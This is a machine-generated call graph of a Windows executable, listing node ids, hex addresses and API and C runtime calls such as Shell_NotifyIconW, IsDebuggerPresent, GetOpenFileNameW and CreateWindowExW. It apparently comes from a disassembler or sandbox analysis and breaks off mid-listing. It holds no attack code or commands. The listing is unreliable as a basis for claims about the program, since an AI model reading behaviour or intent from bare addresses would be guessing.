100930->101062 100933 6043fa 100935 604430 Shell_NotifyIconW 100933->100935 100936 604414 Shell_NotifyIconW 100933->100936 100937 604422 100935->100937 100936->100937 100938 60407c 61 API calls 100937->100938 100939 604429 100938->100939 100939->100915 100940->100911 100941->100915 100942->100897 100944 604098 100943->100944 100964 60416f Mailbox 100943->100964 100965 607a16 100944->100965 100947 6040b3 100970 607bcc 100947->100970 100948 63d3c8 LoadStringW 100951 63d3e2 100948->100951 100950 6040c8 100950->100951 100952 6040d9 100950->100952 100953 607b2e 59 API calls 100951->100953 100954 6040e3 100952->100954 100955 604174 100952->100955 100958 63d3ec 100953->100958 100979 607b2e 100954->100979 100988 608047 100955->100988 100960 6040ed _memset _wcscpy 100958->100960 100992 607cab 100958->100992 100962 604155 Shell_NotifyIconW 100960->100962 100961 63d40e 100963 607cab 59 API calls 100961->100963 100962->100964 100963->100960 100964->100921 100999 620db6 100965->100999 100967 607a3b 101009 608029 100967->101009 100971 607c45 100970->100971 100973 607bd8 __NMSG_WRITE 100970->100973 101041 607d2c 100971->101041 100974 607c13 100973->100974 100975 607bee 100973->100975 100977 608029 59 API calls 100974->100977 101040 607f27 59 API calls Mailbox 100975->101040 100978 607bf6 _memmove 100977->100978 100978->100950 100980 607b40 100979->100980 100981 63ec6b 100979->100981 101049 607a51 100980->101049 101055 657bdb 59 API calls _memmove 100981->101055 100984 607b4c 100984->100960 100985 63ec75 100986 608047 59 API calls 100985->100986 100987 63ec7d Mailbox 100986->100987 100989 608052 100988->100989 100990 60805a 100988->100990 101056 607f77 59 API calls 2 library calls 100989->101056 100990->100960 100993 63ed4a 100992->100993 100994 607cbf 100992->100994 100996 608029 59 API calls 100993->100996 101057 607c50 100994->101057 100998 63ed55 __NMSG_WRITE _memmove 100996->100998 100997 607cca 100997->100961 101002 620dbe 100999->101002 101001 620dd8 101001->100967 101002->101001 101004 620ddc std::exception::exception 101002->101004 101012 62571c 101002->101012 101029 6233a1 DecodePointer 101002->101029 101030 62859b RaiseException 101004->101030 101006 620e06 101031 6284d1 58 API calls _free 101006->101031 101008 620e18 101008->100967 101010 620db6 Mailbox 59 API calls 101009->101010 101011 6040a6 101010->101011 101011->100947 101011->100948 101013 625797 101012->101013 101022 625728 101012->101022 101038 6233a1 DecodePointer 101013->101038 101015 62579d 101039 628b28 58 API calls __getptd_noexit 101015->101039 101018 62575b RtlAllocateHeap 101019 62578f 101018->101019 101018->101022 101019->101002 101021 625783 101036 628b28 58 API calls __getptd_noexit 101021->101036 101022->101018 101022->101021 101023 625733 101022->101023 101027 625781 101022->101027 101035 6233a1 DecodePointer 101022->101035 101023->101022 101032 62a16b 58 API calls __NMSG_WRITE 101023->101032 101033 62a1c8 58 API calls 5 library calls 101023->101033 101034 62309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101023->101034 101037 628b28 58 API calls __getptd_noexit 101027->101037 101029->101002 101030->101006 101031->101008 101032->101023 101033->101023 101035->101022 101036->101027 101037->101019 101038->101015 101039->101019 101040->100978 101042 607d3a 101041->101042 101044 607d43 _memmove 101041->101044 101042->101044 101045 607e4f 101042->101045 101044->100978 101046 607e62 101045->101046 101048 607e5f _memmove 101045->101048 101047 620db6 Mailbox 59 API calls 101046->101047 101047->101048 101048->101044 101050 607a5f 101049->101050 101054 607a85 _memmove 101049->101054 101051 620db6 Mailbox 59 API calls 101050->101051 101050->101054 101052 607ad4 101051->101052 101053 620db6 Mailbox 59 API calls 101052->101053 101053->101054 101054->100984 101055->100985 101056->100990 101058 607c5f __NMSG_WRITE 101057->101058 101059 608029 59 API calls 101058->101059 101060 607c70 _memmove 101058->101060 101061 63ed07 _memmove 101059->101061 101060->100997 101063 63d423 101062->101063 101064 604196 101062->101064 101063->101064 101065 63d42c DestroyIcon 101063->101065 101064->100933 101066 662f94 62 API calls _W_store_winword 101064->101066 101065->101064 101066->100933 101067 627c56 101068 627c62 __wsopen_helper 101067->101068 101104 629e08 GetStartupInfoW 101068->101104 101071 627c67 101106 628b7c GetProcessHeap 101071->101106 101072 627cbf 101073 627cca 101072->101073 101189 627da6 58 API calls 3 library calls 101072->101189 101107 629ae6 101073->101107 101076 627cd0 101077 627cdb __RTC_Initialize 101076->101077 101190 627da6 58 API calls 3 library calls 101076->101190 101128 62d5d2 101077->101128 101080 627cea 101081 627cf6 GetCommandLineW 101080->101081 101191 627da6 58 API calls 3 library calls 101080->101191 101147 634f23 GetEnvironmentStringsW 101081->101147 101084 627cf5 101084->101081 101087 627d10 101088 627d1b 101087->101088 101192 6230b5 58 API calls 3 library calls 101087->101192 101157 634d58 101088->101157 101091 627d21 101092 627d2c 101091->101092 101193 6230b5 58 API calls 3 library calls 101091->101193 101171 6230ef 101092->101171 101095 627d34 101096 627d3f __wwincmdln 101095->101096 101194 6230b5 58 API calls 3 library calls 101095->101194 101177 6047d0 101096->101177 101099 627d53 101100 627d62 101099->101100 101195 623358 58 API calls _doexit 101099->101195 101196 6230e0 58 API calls _doexit 101100->101196 101103 627d67 __wsopen_helper 101105 629e1e 101104->101105 101105->101071 101106->101072 101197 623187 36 API calls 2 library calls 101107->101197 101109 629aeb 101198 629d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 101109->101198 101111 629af0 101112 629af4 101111->101112 101200 629d8a TlsAlloc 101111->101200 101199 629b5c 61 API calls 2 library calls 101112->101199 101115 629af9 101115->101076 101116 629b06 101116->101112 101117 629b11 101116->101117 101201 6287d5 101117->101201 101120 629b53 101209 629b5c 61 API calls 2 library calls 101120->101209 101123 629b32 101123->101120 101125 629b38 101123->101125 101124 629b58 101124->101076 101208 629a33 58 API calls 4 library calls 101125->101208 101127 629b40 GetCurrentThreadId 101127->101076 101129 62d5de __wsopen_helper 101128->101129 101221 629c0b 101129->101221 101131 62d5e5 101132 6287d5 __calloc_crt 58 API calls 101131->101132 101133 62d5f6 101132->101133 101134 62d601 __wsopen_helper @_EH4_CallFilterFunc@8 101133->101134 101135 62d661 GetStartupInfoW 101133->101135 101134->101080 101141 62d676 101135->101141 101144 62d7a5 101135->101144 101136 62d86d 101230 62d87d LeaveCriticalSection _doexit 101136->101230 101138 6287d5 __calloc_crt 58 API calls 101138->101141 101139 62d7f2 GetStdHandle 101139->101144 101140 62d805 GetFileType 101140->101144 101141->101138 101142 62d6c4 101141->101142 101141->101144 101143 62d6f8 GetFileType 101142->101143 101142->101144 101228 629e2b InitializeCriticalSectionAndSpinCount 101142->101228 101143->101142 101144->101136 101144->101139 101144->101140 101229 629e2b InitializeCriticalSectionAndSpinCount 101144->101229 101148 634f34 101147->101148 101149 627d06 101147->101149 101270 62881d 58 API calls 2 library calls 101148->101270 101153 634b1b GetModuleFileNameW 101149->101153 101151 634f5a _memmove 101152 634f70 FreeEnvironmentStringsW 101151->101152 101152->101149 101154 634b4f _wparse_cmdline 101153->101154 101156 634b8f _wparse_cmdline 101154->101156 101271 62881d 58 API calls 2 library calls 101154->101271 101156->101087 101158 634d71 __NMSG_WRITE 101157->101158 101162 634d69 101157->101162 101159 6287d5 __calloc_crt 58 API calls 101158->101159 101167 634d9a __NMSG_WRITE 101159->101167 101160 634df1 101161 622d55 _free 58 API calls 101160->101161 101161->101162 101162->101091 101163 6287d5 __calloc_crt 58 API calls 101163->101167 101164 634e16 101166 622d55 _free 58 API calls 101164->101166 101166->101162 101167->101160 101167->101162 101167->101163 101167->101164 101168 634e2d 101167->101168 101272 634607 58 API calls __gmtime64_s 101167->101272 101273 628dc6 IsProcessorFeaturePresent 101168->101273 101170 634e39 101170->101091 101172 6230fb __IsNonwritableInCurrentImage 101171->101172 101296 62a4d1 101172->101296 101174 623119 __initterm_e 101176 623138 _doexit __IsNonwritableInCurrentImage 101174->101176 101299 622d40 101174->101299 101176->101095 101178 6047ea 101177->101178 101179 604889 101177->101179 101180 604824 IsThemeActive 101178->101180 101179->101099 101334 62336c 101180->101334 101184 604850 101346 6048fd SystemParametersInfoW SystemParametersInfoW 101184->101346 101186 60485c 101347 603b3a 101186->101347 101188 604864 SystemParametersInfoW 101188->101179 101189->101073 101190->101077 101191->101084 101195->101100 101196->101103 101197->101109 101198->101111 101199->101115 101200->101116 101203 6287dc 101201->101203 101204 628817 101203->101204 101205 6287fa 101203->101205 101210 6351f6 101203->101210 101204->101120 101207 629de6 TlsSetValue 101204->101207 101205->101203 101205->101204 101218 62a132 Sleep 101205->101218 101207->101123 101208->101127 101209->101124 101211 635201 101210->101211 101217 63521c 101210->101217 101212 63520d 101211->101212 101211->101217 101219 628b28 58 API calls __getptd_noexit 101212->101219 101214 63522c HeapAlloc 101216 635212 101214->101216 101214->101217 101216->101203 101217->101214 101217->101216 101220 6233a1 DecodePointer 101217->101220 101218->101205 101219->101216 101220->101217 101222 629c2f EnterCriticalSection 101221->101222 101223 629c1c 101221->101223 101222->101131 101231 629c93 101223->101231 101225 629c22 101225->101222 101255 6230b5 58 API calls 3 library calls 101225->101255 101228->101142 101229->101144 101230->101134 101232 629c9f __wsopen_helper 101231->101232 101233 629cc0 101232->101233 101234 629ca8 101232->101234 101242 629ce1 __wsopen_helper 101233->101242 101259 62881d 58 API calls 2 library calls 101233->101259 101256 62a16b 58 API calls __NMSG_WRITE 101234->101256 101237 629cad 101257 62a1c8 58 API calls 5 library calls 101237->101257 101238 629cd5 101240 629ceb 101238->101240 101241 629cdc 101238->101241 101245 629c0b __lock 58 API calls 101240->101245 101260 628b28 58 API calls __getptd_noexit 101241->101260 101242->101225 101243 629cb4 101258 62309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101243->101258 101247 629cf2 101245->101247 101249 629d17 101247->101249 101250 629cff 101247->101250 101262 622d55 101249->101262 101261 629e2b InitializeCriticalSectionAndSpinCount 101250->101261 101253 629d0b 101268 629d33 LeaveCriticalSection _doexit 101253->101268 101256->101237 101257->101243 101259->101238 101260->101242 101261->101253 101263 622d87 _free 101262->101263 101264 622d5e RtlFreeHeap 101262->101264 101263->101253 101264->101263 101265 622d73 101264->101265 101269 628b28 58 API calls __getptd_noexit 101265->101269 101267 622d79 GetLastError 101267->101263 101268->101242 101269->101267 101270->101151 101271->101156 101272->101167 101274 628dd1 101273->101274 101279 628c59 101274->101279 101278 628dec 101278->101170 101280 628c73 _memset ___raise_securityfailure 101279->101280 101281 628c93 IsDebuggerPresent 101280->101281 101287 62a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101281->101287 101284 628d57 ___raise_securityfailure 101288 62c5f6 101284->101288 101285 628d7a 101286 62a140 GetCurrentProcess TerminateProcess 101285->101286 101286->101278 101287->101284 101289 62c600 IsProcessorFeaturePresent 101288->101289 101290 62c5fe 101288->101290 101292 63590a 101289->101292 101290->101285 101295 6358b9 5 API calls 2 library calls 101292->101295 101294 6359ed 101294->101285 101295->101294 101297 62a4d4 EncodePointer 101296->101297 101297->101297 101298 62a4ee 101297->101298 101298->101174 101302 622c44 101299->101302 101301 622d4b 101301->101176 101303 622c50 __wsopen_helper 101302->101303 101310 623217 101303->101310 101309 622c77 __wsopen_helper 101309->101301 101311 629c0b __lock 58 API calls 101310->101311 101312 622c59 101311->101312 101313 622c88 DecodePointer DecodePointer 101312->101313 101314 622c65 101313->101314 101315 622cb5 101313->101315 101324 622c82 101314->101324 101315->101314 101327 6287a4 59 API calls __gmtime64_s 101315->101327 101317 622d18 EncodePointer EncodePointer 101317->101314 101318 622cc7 101318->101317 101320 622cec 101318->101320 101328 628864 61 API calls 2 library calls 101318->101328 101320->101314 101322 622d06 EncodePointer 101320->101322 101329 628864 61 API calls 2 library calls 101320->101329 101322->101317 101323 622d00 101323->101314 101323->101322 101330 623220 101324->101330 101327->101318 101328->101320 101329->101323 101333 629d75 LeaveCriticalSection 101330->101333 101332 622c87 101332->101309 101333->101332 101335 629c0b __lock 58 API calls 101334->101335 101336 623377 DecodePointer EncodePointer 101335->101336 101399 629d75 LeaveCriticalSection 101336->101399 101338 604849 101339 6233d4 101338->101339 101340 6233f8 101339->101340 101341 6233de 101339->101341 101340->101184 101341->101340 101400 628b28 58 API calls __getptd_noexit 101341->101400 101343 6233e8 101401 628db6 9 API calls __gmtime64_s 101343->101401 101345 6233f3 101345->101184 101346->101186 101348 603b47 __ftell_nolock 101347->101348 101402 607667 101348->101402 101352 603b7a IsDebuggerPresent 101353 63d272 MessageBoxA 101352->101353 101354 603b88 101352->101354 101356 63d28c 101353->101356 101355 603c61 101354->101355 101354->101356 101357 603ba5 101354->101357 101358 603c68 SetCurrentDirectoryW 101355->101358 101606 607213 59 API calls Mailbox 101356->101606 101488 607285 101357->101488 101361 603c75 Mailbox 101358->101361 101361->101188 101362 63d29c 101367 63d2b2 SetCurrentDirectoryW 101362->101367 101364 603bc3 GetFullPathNameW 101365 607bcc 59 API calls 101364->101365 101366 603bfe 101365->101366 101504 61092d 101366->101504 101367->101361 101370 603c1c 101371 603c26 101370->101371 101607 65874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101370->101607 101520 603a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101371->101520 101374 63d2cf 101374->101371 101378 63d2e0 101374->101378 101377 603c30 101379 603c43 101377->101379 101381 60434a 68 API calls 101377->101381 101608 604706 101378->101608 101528 6109d0 101379->101528 101381->101379 101383 63d2e8 101615 607de1 101383->101615 101385 603c4e 101385->101355 101605 60443a Shell_NotifyIconW _memset 101385->101605 101386 63d2f5 101387 63d324 101386->101387 101388 63d2ff 101386->101388 101399->101338 101400->101343 101401->101345 101403 620db6 Mailbox 59 API calls 101402->101403 101404 607688 101403->101404 101405 620db6 Mailbox 59 API calls 101404->101405 101406 603b51 GetCurrentDirectoryW 101405->101406 101407 603766 101406->101407 101408 607667 59 API calls 101407->101408 101409 60377c 101408->101409 101619 603d31 101409->101619 101411 60379a 101412 604706 61 API calls 101411->101412 101413 6037ae 101412->101413 101414 607de1 59 API calls 101413->101414 101415 6037bb 101414->101415 101633 604ddd 101415->101633 101418 63d173 101700 66955b 101418->101700 101419 6037dc Mailbox 101423 608047 59 API calls 101419->101423 101422 63d192 101425 622d55 _free 58 API calls 101422->101425 101426 6037ef 101423->101426 101427 63d19f 101425->101427 101657 60928a 101426->101657 101429 604e4a 84 API calls 101427->101429 101431 63d1a8 101429->101431 101435 603ed0 59 API calls 101431->101435 101432 607de1 59 API calls 101433 603808 101432->101433 101660 6084c0 101433->101660 101437 63d1c3 101435->101437 101436 60381a Mailbox 101438 607de1 59 API calls 101436->101438 101439 603ed0 59 API calls 101437->101439 101440 603840 101438->101440 101441 63d1df 101439->101441 101442 6084c0 69 API calls 101440->101442 101443 604706 61 API calls 101441->101443 101445 60384f Mailbox 101442->101445 101444 63d204 101443->101444 101446 603ed0 59 API calls 101444->101446 101448 607667 59 API calls 101445->101448 101447 63d210 101446->101447 101449 608047 59 API calls 101447->101449 101450 60386d 101448->101450 101451 63d21e 101449->101451 101664 603ed0 101450->101664 101453 603ed0 59 API calls 101451->101453 101455 63d22d 101453->101455 101461 608047 59 API calls 101455->101461 101457 603887 101457->101431 101458 603891 101457->101458 101459 622efd _W_store_winword 60 API calls 101458->101459 101460 60389c 101459->101460 101460->101437 101462 6038a6 101460->101462 101463 63d24f 101461->101463 101464 622efd _W_store_winword 60 API calls 101462->101464 101465 603ed0 59 API calls 101463->101465 101466 6038b1 101464->101466 101467 63d25c 101465->101467 101466->101441 101468 6038bb 101466->101468 101467->101467 101469 622efd _W_store_winword 60 API calls 101468->101469 101470 6038c6 101469->101470 101470->101455 101471 603907 101470->101471 101473 603ed0 59 API calls 101470->101473 101471->101455 101472 603914 101471->101472 101680 6092ce 101472->101680 101475 6038ea 101473->101475 101477 608047 59 API calls 101475->101477 101479 6038f8 101477->101479 101481 603ed0 59 API calls 101479->101481 101481->101471 101483 60394f 101484 60928a 59 API calls 101483->101484 101485 603995 Mailbox 101483->101485 101486 608ee0 60 API calls 101483->101486 101487 603ed0 59 API calls 101483->101487 101484->101483 101485->101352 101486->101483 101487->101483 101489 607292 __ftell_nolock 101488->101489 101490 63ea22 _memset 101489->101490 101491 6072ab 101489->101491 101494 63ea3e GetOpenFileNameW 101490->101494 102584 604750 101491->102584 101496 63ea8d 101494->101496 101498 607bcc 59 API calls 101496->101498 101500 63eaa2 101498->101500 101500->101500 101501 6072c9 102612 60686a 101501->102612 101505 61093a __ftell_nolock 101504->101505 102874 606d80 101505->102874 101507 61093f 101518 603c14 101507->101518 102885 61119e 89 API calls 101507->102885 101509 61094c 101509->101518 102886 613ee7 91 API calls Mailbox 101509->102886 101511 610955 101512 610959 GetFullPathNameW 101511->101512 101511->101518 101513 607bcc 59 API calls 101512->101513 101514 610985 101513->101514 101515 607bcc 59 API calls 101514->101515 101516 610992 101515->101516 101517 607bcc 59 API calls 101516->101517 101519 644cab _wcscat 101516->101519 101517->101518 101518->101362 101518->101370 101521 603ab0 LoadImageW RegisterClassExW 101520->101521 101522 63d261 101520->101522 102919 603041 7 API calls 101521->102919 102920 6047a0 LoadImageW EnumResourceNamesW 101522->102920 101525 603b34 101527 6039d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101525->101527 101526 63d26a 101527->101377 101529 644cc3 101528->101529 101540 6109f5 101528->101540 103061 669e4a 89 API calls 4 library calls 101529->103061 101531 610cfa 101531->101385 101533 610ee4 101533->101531 101535 610ef1 101533->101535 103059 611093 341 API calls Mailbox 101535->103059 101536 610a4b PeekMessageW 101603 610a05 Mailbox 101536->101603 101540->101603 103062 609e5d 60 API calls 101540->103062 103063 656349 341 API calls 101540->103063 101541 644e81 Sleep 101541->101603 101543 610ce4 101543->101531 103058 611070 10 API calls Mailbox 101543->103058 101547 610e43 PeekMessageW 101547->101603 101548 610ea5 TranslateMessage DispatchMessageW 101548->101547 101549 644d50 TranslateAcceleratorW 101549->101547 101549->101603 101550 609e5d 60 API calls 101550->101603 101551 610d13 timeGetTime 101551->101603 101552 64581f WaitForSingleObject 101557 64583c GetExitCodeProcess CloseHandle 101552->101557 101552->101603 101554 620db6 59 API calls Mailbox 101554->101603 101555 608047 59 API calls 101555->101603 101556 607667 59 API calls 101589 610e70 Mailbox 101556->101589 101587 610f95 101557->101587 101558 610e5f Sleep 101558->101589 101559 645af8 Sleep 101559->101589 101562 62049f timeGetTime 101562->101589 101563 610f4e timeGetTime 103060 609e5d 60 API calls 101563->103060 101566 645b8f GetExitCodeProcess 101571 645ba5 WaitForSingleObject 101566->101571 101572 645bbb CloseHandle 101566->101572 101569 685f25 110 API calls 101569->101589 101570 60b7dd 109 API calls 101570->101589 101571->101572 101571->101603 101572->101589 101574 645874 101574->101587 101575 645078 Sleep 101575->101603 101576 645c17 Sleep 101576->101603 101579 607de1 59 API calls 101579->101589 101582 609ea0 314 API calls 101582->101603 101587->101385 101589->101556 101589->101562 101589->101566 101589->101569 101589->101570 101589->101574 101589->101575 101589->101576 101589->101579 101589->101587 101589->101603 103098 662408 60 API calls 101589->103098 103099 609e5d 60 API calls 101589->103099 103100 6089b3 69 API calls Mailbox 101589->103100 103101 60b73c 341 API calls 101589->103101 103102 6564da 60 API calls 101589->103102 103103 665244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101589->103103 103104 663c55 66 API calls Mailbox 101589->103104 101591 669e4a 89 API calls 101591->101603 101592 609c90 59 API calls Mailbox 101592->101603 101593 6084c0 69 API calls 101593->101603 101595 65617e 59 API calls Mailbox 101595->101603 101596 607de1 59 API calls 101596->101603 101597 6089b3 69 API calls 101597->101603 101598 6455d5 VariantClear 101598->101603 101599 656e8f 59 API calls 101599->101603 101600 64566b VariantClear 101600->101603 101601 645419 VariantClear 101601->101603 101602 608cd4 59 API calls Mailbox 101602->101603 101603->101536 101603->101541 101603->101543 101603->101547 101603->101548 101603->101549 101603->101550 101603->101551 101603->101552 101603->101554 101603->101555 101603->101558 101603->101559 101603->101563 101603->101582 101603->101587 101603->101589 101603->101591 101603->101592 101603->101593 101603->101595 101603->101596 101603->101597 101603->101598 101603->101599 101603->101600 101603->101601 101603->101602 101604 60b73c 314 API calls 101603->101604 102921 60e6a0 101603->102921 102952 60f460 101603->102952 102972 6031ce 101603->102972 102977 60e420 341 API calls 101603->102977 102978 60fce0 101603->102978 103064 686018 59 API calls 101603->103064 103065 669a15 59 API calls Mailbox 101603->103065 103066 65d4f2 59 API calls 101603->103066 103067 609837 101603->103067 103085 6560ef 59 API calls 2 library calls 101603->103085 103086 608401 59 API calls 101603->103086 103087 6082df 101603->103087 101604->101603 101605->101355 101606->101362 101607->101374 101609 631940 __ftell_nolock 101608->101609 101610 604713 GetModuleFileNameW 101609->101610 101611 607de1 59 API calls 101610->101611 101612 604739 101611->101612 101613 604750 60 API calls 101612->101613 101614 604743 Mailbox 101613->101614 101614->101383 101616 607df0 __NMSG_WRITE _memmove 101615->101616 101617 620db6 Mailbox 59 API calls 101616->101617 101618 607e2e 101617->101618 101618->101386 101620 603d3e __ftell_nolock 101619->101620 101621 607bcc 59 API calls 101620->101621 101626 603ea4 Mailbox 101620->101626 101623 603d70 101621->101623 101632 603da6 Mailbox 101623->101632 101741 6079f2 101623->101741 101624 6079f2 59 API calls 101624->101632 101625 603e77 101625->101626 101627 607de1 59 API calls 101625->101627 101626->101411 101629 603e98 101627->101629 101628 607de1 59 API calls 101628->101632 101630 603f74 59 API calls 101629->101630 101630->101626 101632->101624 101632->101625 101632->101626 101632->101628 101744 603f74 101632->101744 101750 604bb5 101633->101750 101638 63d8e6 101640 604e4a 84 API calls 101638->101640 101639 604e08 LoadLibraryExW 101760 604b6a 101639->101760 101643 63d8ed 101640->101643 101645 604b6a 3 API calls 101643->101645 101647 63d8f5 101645->101647 101646 604e2f 101646->101647 101648 604e3b 101646->101648 101786 604f0b 101647->101786 101649 604e4a 84 API calls 101648->101649 101651 6037d4 101649->101651 101651->101418 101651->101419 101654 63d91c 101794 604ec7 101654->101794 101656 63d929 101658 620db6 Mailbox 59 API calls 101657->101658 101659 6037fb 101658->101659 101659->101432 101661 6084cb 101660->101661 101663 6084f2 101661->101663 102224 6089b3 69 API calls Mailbox 101661->102224 101663->101436 101665 603ef3 101664->101665 101666 603eda 101664->101666 101668 607bcc 59 API calls 101665->101668 101667 608047 59 API calls 101666->101667 101669 603879 101667->101669 101668->101669 101670 622efd 101669->101670 101671 622f09 101670->101671 101672 622f7e 101670->101672 101679 622f2e 101671->101679 102225 628b28 58 API calls __getptd_noexit 101671->102225 102227 622f90 60 API calls 3 library calls 101672->102227 101675 622f8b 101675->101457 101676 622f15 102226 628db6 9 API calls __gmtime64_s 101676->102226 101678 622f20 101678->101457 101679->101457 101681 6092d6 101680->101681 101682 620db6 Mailbox 59 API calls 101681->101682 101683 6092e4 101682->101683 101684 603924 101683->101684 102228 6091fc 59 API calls Mailbox 101683->102228 101686 609050 101684->101686 102229 609160 101686->102229 101688 620db6 Mailbox 59 API calls 101690 603932 101688->101690 101689 60905f 101689->101688 101689->101690 101691 608ee0 101690->101691 101692 63f17c 101691->101692 101694 608ef7 101691->101694 101692->101694 102256 608bdb 59 API calls Mailbox 101692->102256 101695 609040 101694->101695 101696 608ff8 101694->101696 101699 608fff 101694->101699 102243 609d3c 101695->102243 101698 620db6 Mailbox 59 API calls 101696->101698 101698->101699 101699->101483 101701 604ee5 85 API calls 101700->101701 101702 6695ca 101701->101702 102259 669734 101702->102259 101705 604f0b 74 API calls 101706 6695f7 101705->101706 101707 604f0b 74 API calls 101706->101707 101708 669607 101707->101708 101709 604f0b 74 API calls 101708->101709 101710 669622 101709->101710 101711 604f0b 74 API calls 101710->101711 101712 66963d 101711->101712 101713 604ee5 85 API calls 101712->101713 101714 669654 101713->101714 101715 62571c __crtGetStringTypeA_stat 58 API calls 101714->101715 101716 66965b 101715->101716 101717 62571c __crtGetStringTypeA_stat 58 API calls 101716->101717 101718 669665 101717->101718 101719 604f0b 74 API calls 101718->101719 101720 669679 101719->101720 101721 669109 GetSystemTimeAsFileTime 101720->101721 101722 66968c 101721->101722 101723 6696b6 101722->101723 101724 6696a1 101722->101724 101726 6696bc 101723->101726 101727 66971b 101723->101727 101725 622d55 _free 58 API calls 101724->101725 101729 6696a7 101725->101729 102265 668b06 101726->102265 101728 622d55 _free 58 API calls 101727->101728 101731 63d186 101728->101731 101732 622d55 _free 58 API calls 101729->101732 101731->101422 101735 604e4a 101731->101735 101732->101731 101734 622d55 _free 58 API calls 101734->101731 101736 604e54 101735->101736 101738 604e5b 101735->101738 101737 6253a6 __fcloseall 83 API calls 101736->101737 101737->101738 101739 604e6a 101738->101739 101740 604e7b FreeLibrary 101738->101740 101739->101422 101740->101739 101742 607e4f 59 API calls 101741->101742 101743 6079fd 101742->101743 101743->101623 101745 603f82 101744->101745 101749 603fa4 _memmove 101744->101749 101747 620db6 Mailbox 59 API calls 101745->101747 101746 620db6 Mailbox 59 API calls 101748 603fb8 101746->101748 101747->101749 101748->101632 101749->101746 101799 604c03 101750->101799 101753 604bdc 101755 604bf5 101753->101755 101756 604bec FreeLibrary 101753->101756 101754 604c03 2 API calls 101754->101753 101757 62525b 101755->101757 101756->101755 101803 625270 101757->101803 101759 604dfc 101759->101638 101759->101639 101961 604c36 101760->101961 101763 604b8f 101764 604ba1 FreeLibrary 101763->101764 101765 604baa 101763->101765 101764->101765 101767 604c70 101765->101767 101766 604c36 2 API calls 101766->101763 101768 620db6 Mailbox 59 API calls 101767->101768 101769 604c85 101768->101769 101965 60522e 101769->101965 101771 604c91 _memmove 101772 604ccc 101771->101772 101773 604dc1 101771->101773 101774 604d89 101771->101774 101775 604ec7 69 API calls 101772->101775 101979 66991b 95 API calls 101773->101979 101968 604e89 CreateStreamOnHGlobal 101774->101968 101783 604cd5 101775->101783 101778 604f0b 74 API calls 101778->101783 101779 604d69 101779->101646 101781 63d8a7 101782 604ee5 85 API calls 101781->101782 101784 63d8bb 101782->101784 101783->101778 101783->101779 101783->101781 101974 604ee5 101783->101974 101785 604f0b 74 API calls 101784->101785 101785->101779 101787 604f1d 101786->101787 101788 63d9cd 101786->101788 102003 6255e2 101787->102003 101791 669109 102201 668f5f 101791->102201 101793 66911f 101793->101654 101795 63d990 101794->101795 101796 604ed6 101794->101796 102206 625c60 101796->102206 101798 604ede 101798->101656 101800 604bd0 101799->101800 101801 604c0c LoadLibraryA 101799->101801 101800->101753 101800->101754 101801->101800 101802 604c1d GetProcAddress 101801->101802 101802->101800 101806 62527c __wsopen_helper 101803->101806 101804 62528f 101852 628b28 58 API calls __getptd_noexit 101804->101852 101806->101804 101808 6252c0 101806->101808 101807 625294 101853 628db6 9 API calls __gmtime64_s 101807->101853 101822 6304e8 101808->101822 101811 6252c5 101812 6252db 101811->101812 101813 6252ce 101811->101813 101814 625305 101812->101814 101815 6252e5 101812->101815 101854 628b28 58 API calls __getptd_noexit 101813->101854 101837 630607 101814->101837 101855 628b28 58 API calls __getptd_noexit 101815->101855 101817 62529f __wsopen_helper @_EH4_CallFilterFunc@8 101817->101759 101823 6304f4 __wsopen_helper 101822->101823 101824 629c0b __lock 58 API calls 101823->101824 101825 630502 101824->101825 101826 63057d 101825->101826 101832 629c93 __mtinitlocknum 58 API calls 101825->101832 101835 630576 101825->101835 101860 626c50 59 API calls __lock 101825->101860 101861 626cba LeaveCriticalSection LeaveCriticalSection _doexit 101825->101861 101862 62881d 58 API calls 2 library calls 101826->101862 101829 630584 101829->101835 101863 629e2b InitializeCriticalSectionAndSpinCount 101829->101863 101830 6305f3 __wsopen_helper 101830->101811 101832->101825 101834 6305aa EnterCriticalSection 101834->101835 101857 6305fe 101835->101857 101838 630627 __wopenfile 101837->101838 101839 630641 101838->101839 101851 6307fc 101838->101851 101870 6237cb 60 API calls 2 library calls 101838->101870 101868 628b28 58 API calls __getptd_noexit 101839->101868 101841 630646 101869 628db6 9 API calls __gmtime64_s 101841->101869 101843 63085f 101865 6385a1 101843->101865 101844 625310 101856 625332 LeaveCriticalSection LeaveCriticalSection _fseek 101844->101856 101847 6307f5 101847->101851 101871 6237cb 60 API calls 2 library calls 101847->101871 101849 630814 101849->101851 101872 6237cb 60 API calls 2 library calls 101849->101872 101851->101839 101851->101843 101852->101807 101853->101817 101854->101817 101855->101817 101856->101817 101864 629d75 LeaveCriticalSection 101857->101864 101859 630605 101859->101830 101860->101825 101861->101825 101862->101829 101863->101834 101864->101859 101873 637d85 101865->101873 101867 6385ba 101867->101844 101868->101841 101869->101844 101870->101847 101871->101849 101872->101851 101874 637d91 __wsopen_helper 101873->101874 101875 637da7 101874->101875 101878 637ddd 101874->101878 101958 628b28 58 API calls __getptd_noexit 101875->101958 101877 637dac 101959 628db6 9 API calls __gmtime64_s 101877->101959 101884 637e4e 101878->101884 101881 637db6 __wsopen_helper 101881->101867 101882 637df9 101960 637e22 LeaveCriticalSection __unlock_fhandle 101882->101960 101885 637e6e 101884->101885 101886 6244ea __wsopen_nolock 58 API calls 101885->101886 101889 637e8a 101886->101889 101887 628dc6 __invoke_watson 8 API calls 101888 6385a0 101887->101888 101890 637d85 __wsopen_helper 103 API calls 101888->101890 101891 637ec4 101889->101891 101902 637ee7 101889->101902 101957 637fc1 101889->101957 101893 6385ba 101890->101893 101892 628af4 __write 58 API calls 101891->101892 101894 637ec9 101892->101894 101893->101882 101895 628b28 __gmtime64_s 58 API calls 101894->101895 101896 637ed6 101895->101896 101898 628db6 __gmtime64_s 9 API calls 101896->101898 101897 637fa5 101899 628af4 __write 58 API calls 101897->101899 101900 637ee0 101898->101900 101901 637faa 101899->101901 101900->101882 101903 628b28 __gmtime64_s 58 API calls 101901->101903 101902->101897 101906 637f83 101902->101906 101904 637fb7 101903->101904 101905 628db6 __gmtime64_s 9 API calls 101904->101905 101905->101957 101907 62d294 __alloc_osfhnd 61 API calls 101906->101907 101908 638051 